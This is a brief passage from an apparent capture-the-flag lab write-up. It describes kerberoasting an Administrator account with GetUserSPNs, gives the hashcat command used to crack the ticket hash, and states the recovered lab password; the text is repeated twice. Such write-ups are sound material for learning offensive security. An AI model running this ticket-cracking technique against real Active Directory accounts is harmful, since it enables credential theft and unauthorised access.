Exploitation

Using the credentials I was able to get the TGS for the Administrator user with GetUserSPNs and was able to kerberoast successfully.

Using the following command I was able to crack the TGS.

hashcat -m 13100 -a 0 user.txt /usr/share/wordlists/rockyou.txt --force

The password for the Administrator account was Ticketmaster1968.

Last updated 1 month ago

Using the credentials I was able to get the TGS for the Administrator user with GetUserSPNs and was able to kerberoast successfully.

Using the following command I was able to crack the TGS.

hashcat -m 13100 -a 0 user.txt /usr/share/wordlists/rockyou.txt --force

The password for the Administrator account was Ticketmaster1968.